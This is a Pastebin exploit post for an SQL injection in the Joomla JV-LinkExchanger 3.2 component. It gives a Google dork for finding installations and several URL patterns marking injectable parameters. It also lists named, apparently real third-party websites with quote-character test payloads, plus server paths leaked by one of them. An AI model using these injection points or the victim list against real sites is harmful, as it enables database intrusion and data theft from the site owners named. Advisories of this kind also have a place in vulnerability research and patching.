KingSkrupellos

Joomla JVLE JV-LinkExchanger 3.2 SQL Injection

Feb 9th, 2019
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla JVLE JV-LinkExchanger 3.2 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/02/2019
  7. # Vendor Homepage : jv-extensions.com
  8. # Software Download Link : jv-extensions.com/customer-orders-and-downloads
  9. # Software Information Link : extensions.joomla.org/extension/jv-linkexchanger-jvlinx/
  10. .jv-extensions.com/blog/jv-linkexchanger-3-0-for-joomla-3-x-and-2-7-44-for-joomla-2-5
  11. # Software Version : 3.2
  12. + JV-LinkExchanger 3.0 for Joomla 3.x and 2.7.44 for Joomla 2.5
  13. # Tested On : Windows and Linux
  14. # Category : WebApps
  15. # Exploit Risk : Medium
  16. # Google Dorks : inurl:''/index.php?option=com_jvle''
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. JV-LinkExchanger (JV-LE) is a free and basic reciprocal link and banner exchange Joomla!
  28.  
  29. extension. JV-LinkExchanger or JV-LE in short has all the elements required for a basic
  30.  
  31. and successful link and banner exchange for Joomla websites. JV-LE provides the
  32.  
  33. necessary screens, forms, logic, processing power, features, design and the flexibility
  34.  
  35. to enable your Joomla website to exchange links with other Joomla and non-Joomla websites.
  36.  
  37. ####################################################################
  38.  
  39. # Impact :
  40. ***********
  41. Joomla JVLE JV-LinkExchanger 3.2 and other versions - component for Joomla is prone
  42.  
  43. to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  44.  
  45. data before using it in an SQL query.
  46.  
  47. Exploiting this issue could allow an attacker to compromise the application,
  48.  
  49. access or modify data, or exploit latent vulnerabilities in the underlying database.
  50.  
  51. A remote attacker can send a specially crafted request to the vulnerable application
  52.  
  53. and execute arbitrary SQL commands in application`s database.
  54.  
  55. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  56.  
  57. An attacker can exploit this issue using a browser.
  58.  
  59. ####################################################################
  60.  
  61. # SQL Injection Exploit :
  62. **********************
  63. /index.php?option=com_jvle&Itemid=[SQL Injection]
  64.  
  65. /index.php?option=com_jvle&Itemid=[ID-NUMBER]&view=all_category_links&cid=[SQL Injection]
  66.  
  67. /index.php?option=com_jvle&Itemid=[ID-NUMBER]&view=all_category_links&cid=[ID-NUMBER]&sby=[SQL Injection]
  68.  
  69. /index.php?option=com_jvle&Itemid=[ID-NUMBER]&view=all_category_links&cid=[ID-NUMBER]&sby=&jsn_setmobile=yes&jsn_setmobile=[SQL Injection]
  70.  
  71. /index.php?option=com_jvle&Itemid=[ID-NUMBER]&task=all_category_links&cid=[ID-NUMBER]&sby=[SQL Injection]
  72.  
  73. ####################################################################
  74.  
  75. # Example Vulnerable Sites :
  76. *************************
  77. [+] junmuaythai.com/index.php?option=com_jvle&Itemid=95&view=
  78. all_category_links&cid=3&sby=&jsn_setmobile=yes&jsn_setmobile=1%27
  79.  
  80. [+] pinecountryrestaurant.com/index.php?option=com_jvle&Itemid=222%27
  81.  
  82. [+] autocarscarrera.es/index.php?option=com_jvle&Itemid=102
  83. &view=all_category_links&cid=2&sby=1%27
  84.  
  85. [+] astoria-tirol.at/index.php?option=com_jvle&Itemid=232%27
  86.  
  87. [+] rentamax.mx/index.php?option=com_jvle&Itemid=1%27
  88.  
  89. [+] pinecountryrestaurant.com/index.php?option=com_jvle&Itemid=222%27
  90.  
  91. [+] senkovs-handwerker.de/index.php?option=com_jvle
  92. &Itemid=125&task=all_category_links&cid=3&sby=13%27
  93.  
  94. ####################################################################
  95.  
  96. # Example SQL Database Error :
  97. *****************************
  98. Strict Standards: Only variables should be assigned by reference in /home
  99. /webtodolocal/webapps/rentamax/administrator/components/com_jvle
  100. /common/jvle.resources.php on line 70
  101.  
  102. Strict Standards: Declaration of JvleController::display() should be compatible
  103. with JController::display($cachable = false, $urlparams = false) in
  104. /home/webtodolocal/webapps/rentamax/components/com_jvle/controller.php on line 31
  105.  
  106. Deprecated: preg_replace(): The /e modifier is deprecated, use
  107. preg_replace_callback instead in /home/webtodolocal/webapps
  108. /rentamax/libraries/joomla/filter/input.php on line 652
  109.  
  110. ####################################################################
  111.  
  112. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  113.  
  114. ####################################################################
Add Comment
Please, Sign In to add comment